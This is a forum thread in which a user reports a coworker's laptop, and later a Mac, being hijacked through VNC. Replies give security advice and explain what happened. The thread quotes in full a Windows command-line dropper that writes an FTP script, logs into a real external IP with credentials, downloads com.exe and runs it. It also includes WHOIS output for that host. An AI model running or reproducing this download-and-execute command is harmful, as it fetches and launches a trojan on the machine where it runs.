TLDR: A friend gets remote controlled and strange text is entered into his run command.
My friend and coworker borrowed a laptop from work to use over this weekend. It has VNC (PC remote control software) on it that we use occasionally to make life easier.
He called me up from home just before I left work. Seems he was using the laptop, minding his own business, when all of a sudden the VNC icon goes dark (you are being controlled!) and his mouse starts moving.
He and I both thought it might be another friend from work pranking him...but he shouldn't have an easily tracked IP address when using it at home, right? Plus VNC was supposedly password protected on that machine.
This anonymous person opens a run command and types in the following:
cmd /c echo open 87.230.22.187/httpdocs/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exit
Nothing obvious happens as a result of this. The VNC icon turns white again, my friend regains control and writes all this down and emails it to me.
I googled some of this info and - here is a weird thing -
there is exactly one google result. From just today.
Ok, so I am minding my own business and the browser freezes (mind you, was on Google.com), and spotlight gets the following entered into it:
echo open 87.230.22.187/https/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exitecho You got owned
So, I know this is someone's lame attempt at a hack, but what gets me is how it has come into the system.
I have the normal firewall rules on and no unusual processes running. I was running through my WPA2 protected WIFI connection, but have jumped to hard wired for now and disabled the network for now.
I have not downloaded any questionable content from anywhere and stay updated. I went as far as to go in and install anti-virus on the Mac (even though some may consider it a moot point). Negative on the results. Of course, this sounds like a windows virus. No other windows systems were connected to the network at the time of this 'hack'.
Any ideas? Google returns ZERO results.
I'm really curious at this point. My work computer has Deep Freeze on it, which means any changes made to the computer at all are not remembered after a reboot - meaning I am pretty much safe from viruses and such. So I boldly type in the IP address into a browser to see what happens.
The site comes up Forbidden, denied access...but it wants to install an activex control, something about "Microsoft Remote Data," and a strange vcard dialog pops up. And after a few seconds, maybe I'm misinterpreting the significance of this, but a photoshop document I had minimized suddenly came to the front.
So I held in the power button and came home.
I really want to know what that command is supposed to do! Based on almost no knowledge at all, I am guessing that it's trying to pull com.exe off of some server and run it, and the second bit is authentication? I like how the Mac guy's version ends with "you got owned."
I'm going to go out on a limb here and say for the love of god don't type this in unless you really know what you're doing.
EDIT: Output from several lookup websites for that IP; apparently it's German.
Host name: lvps87-230-22-187.dedicated.hosteurope.de.
IP address: 87.230.22.187
Location: Berlin, GERMANY
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 87.0.0.0 - 87.255.255.255
CIDR: 87.0.0.0/8
NetName: 87-RIPE
NetHandle: NET-87-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
http://www.ripe.net/whois
RegDate: 2004-04-01
Updated: 2004-04-06
# ARIN WHOIS database, last updated 2008-11-25 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See
http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '87.230.22.0 - 87.230.22.255'
inetnum: 87.230.22.0 - 87.230.22.255
remarks: INFRA-AW
netname: HE-DS-22-CGN2-NET
descr: Hosteurope GmbH
descr:
koeln@hosteurope.de
country: DE
admin-c: HER4-RIPE
tech-c: HER
status: ASSIGNED PA
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
role: Host Europe Ripehandle
address: Hansestr. 109
address: 51149 Koeln
phone: +49 2203 1045 0
abuse-mailbox:
net-abuse@hosteurope.de
admin-c: DART
admin-c: FLX
admin-c: WIRR
admin-c: SHAF
admin-c: HONK
tech-c: DART
tech-c: FLX
tech-c: WIRR
tech-c: SHAF
tech-c: HONK
nic-hdl: HER
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
person: Uwe Braun
address: Hansestr. 109
address: 51149 Koeln
phone: +49 2203 1045 7000
nic-hdl: HER4-RIPE
source: RIPE # Filtered
mnt-by: ONE2ONE-MNT
% Information related to '87.230.0.0/17AS20773'
route: 87.230.0.0/17
descr: DE-HER-87-230-SLASH-17
origin: AS20773
member-of: AS20773:RS-HOSTEUROPE
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
Posts
As a general rule of thumb you should never keep VNC open to the world. Even if it's password protected. If your password is simplistic they could have brute forced it. If the version of VNC is older it could have been exploited. Even if you use a complex password and an up to date version of VNC, straight (normal) VNC is unencrypted so your password is sent in the clear.
Of course. That wasn't really my concern, we can easily redo that laptop and disable VNC when people go on the road. It's strange though how the same thing happened on a Mac.
So what most likely happened is your friend took the laptop onto a network that was exposed to the outside world, same thing most likely happened to the mac kid. VNC is dangerous and if your running it the firewall on the local machine should only expose it to local (same subnet) machines, AND then the router should be set up with proper firewall rules.
I used to intern at a research lab were we ran our own servers. The second you expose a machine to the internet, bots start to hit it to see if they can get in. We had an FTP server, and the amount of failed login attempts was staggering.
Deploy an orbital nuke on that fucker.
Can trade TF2 items or whatever else you're interested in. PM me.
1) creates a file named "ik" containing the necessary commands to log into an FTP server and download a trojan
2) uses the "ik" file to log in and download the trojan
3) deletes the "ik" file
4) runs the trojan